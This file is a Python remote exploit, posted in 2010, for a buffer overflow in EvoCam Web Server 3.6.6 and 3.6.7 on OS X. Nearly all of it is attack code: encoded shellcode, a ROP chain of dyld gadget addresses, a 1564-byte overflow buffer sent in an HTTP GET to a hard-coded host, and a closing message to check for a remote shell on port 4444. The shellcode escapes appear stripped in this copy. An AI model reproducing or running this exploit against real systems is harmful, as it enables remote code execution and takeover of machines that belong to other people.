evocamosx-overflow.txt
Posted on 07 July 2010
#!/usr/bin/python # EvoCam Web Server OSX 3.6.6 and 3.6.7 import socket import struct SHELL = ( "xdbxd2x29xc9xb1x27xbfxb1xd5xb6xd3xd9x74x24" "xf4x5ax83xeaxfcx31x7ax14x03x7axa5x37x43xe2" "x05x2exfcx45xd5x11xadx17x65xf0x80x18x8ax71" "x64x19x94x75x10xdfxc6x27x70x88xe6xc5x65x14" "x6fx2axefxb4x3cxfbxa2x04xaaxcexc3x17x4dx83" "x95x85x21x49xd7xaax33xd0xb5xf8xe5xbex89xe3" "xc4xbfx98x4fx5fx78x6dxabxdcx6cx8fx08xb1x25" "xc3x3ex6fx07x63x4cxccx14x9fxb2xa7xebx51x75" "x17x5cxc2x25x27x67x2fx45xd7x08x93x6bxa2x21" "x5cx31x81xb2x1fx4cx19xc7x08x80xd9x77x5fxcd" "xf6x04xf7x79x27x89x6ex14xbexaex21xb8x93x60" "x72x03xdex01x43xb4xb0x88x47x64x60xd8xd7xd5" "x30xd9x1ax55x01x26xf4x06x21x6bx75xac" ) WRITEABLE = 0x8fe66448 # Writable address - dyld STRCPY=0x8fe2db10 # strcpy() in dyld # ==================== Put stack pointer into EAX/EDX ==================== ROP = struct.pack('>I',0x8fe2b3d4) # POP - RET Insturction - Pop's over the writeable value below ROP += struct.pack('>I',WRITEABLE) # Required Writeable address here for exploit to work ROP += struct.pack('>I',0x8fe2fb63) # pop eax # ret - needed for command two below ROP += struct.pack('>I',WRITEABLE) # writeable address to pop into eax for instructions below ROP += struct.pack('>I',0x8fe2fb58) # push esp # and al,0x4 # mov [eax+0x28],edx # mov edx,[esp] # mov [eax],edx # pop eax # ret # ==================== Jump Over Parameters below ==================== ROP += struct.pack('>I',0xffff1d6b) # add esp,byte +0x1c # pop ebp # ret # ==================== strcpy call ==================== ROP += struct.pack('>I',STRCPY) # use strcpy to copy shellcode from stack to heap ROP += struct.pack('>I',0x8fe2dfd1) # POP - POP - RET over strcpy params ROP += struct.pack('>I',WRITEABLE) # Dst Param for strcpy ROP += 'EEEE' # Src Param for strcpy - Placeholder ROP += struct.pack('>I',WRITEABLE) # Move execution to where we moved our shell ROP += 'C'*12 # Padding # ==================== Craft Parameter 2 ==================== # Need to inc EAX or EDX to point to shell code # Store 0x10 in ECX ROP += struct.pack('>I',0x8fe2dae4) # mov ecx,[esp+0x4] # add eax,edx # sub eax,ecx # ret ROP += struct.pack('>I',0x8fe2b3d4) # POP - RET Insturction - Pop's over the value below ROP += struct.pack('>I',0xffffffff) # Value to store in ecx ROP += struct.pack('>I',0x8fe0c0c7) # inc ecx # xor al,0xc9 ROP += struct.pack('>I',0x8fe0c0c7) # inc ecx # xor al,0xc9 ROP += struct.pack('>I',0x8fe24b3c) # add ecx,ecx # ret ROP += struct.pack('>I',0x8fe24b3c) # add ecx,ecx # ret ROP += struct.pack('>I',0x8fe24b3c) # add ecx,ecx # ret ROP += struct.pack('>I',0x8fe24b3c) # add ecx,ecx # ret # Replace stack pointer back into eax as it was trashed ROP += struct.pack('>I',0x8fe2c71d) # mov eax,edx # ret # Add offset to paramter ROP += struct.pack('>I',0x8fe2def4) # add eax,ecx # ret # Swap over so we can work on fresh copy of saved ESP ROP += struct.pack('>I',0x8fe0e32d) # xchg eax,edx # Increase ECX some more times to point to our nop sled/shell code ROP += struct.pack('>I',0x8fe0c0c7) # inc ecx # xor al,0xc9 ROP += struct.pack('>I',0x8fe0c0c7) # inc ecx # xor al,0xc9 ROP += struct.pack('>I',0x8fe24b3c) # add ecx,ecx # ret ROP += struct.pack('>I',0x8fe24b3c) # add ecx,ecx # ret ROP += struct.pack('>I',0x8fe24b3c) # add ecx,ecx # ret # Add offset to shellcode ROP += struct.pack('>I',0x8fe2def4) # add eax,ecx # ret # Swap back ROP += struct.pack('>I',0x8fe0e32d) # xchg eax,edx # Copy parameter to placeholder ROP += struct.pack('>I',0x8fe2fb61) # mov [eax],edx # pop eax # ret ROP += 'G'*4 # junk to pop into eax # ==================== Call strcpy function ==================== # Set our Stack pointer back to original value ROP += struct.pack('>I',0x8fe0e32d) # xchg eax,edx ROP += struct.pack('>I',0x8fe2daea) # sub eax,ecx # ret # Return execution to our strdup call above ROP += struct.pack('>I',0x8fe0b1c2) # xchg eax,ebp # inc ebp # ret ROP += struct.pack('>I',0x8fe2b6a5) # dec ebp # ret ROP += struct.pack('>I',0xffff01f3) # mov esp,ebp # pop ebp # ret ROP += 'G'*4 # junk # ==================== Exploit code to be copied to heap ==================== NOP = 'x90' * 10 BUFFER = 'A'*1564 + ROP + NOP + SHELL s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('192.168.1.10',8080)) print '[+] Sending evil buffer...' s.send("GET " +BUFFER + " HTTP/1.0 ") print "[+] Done!" print "[*] Check your shell on remote host port 4444" s.close()
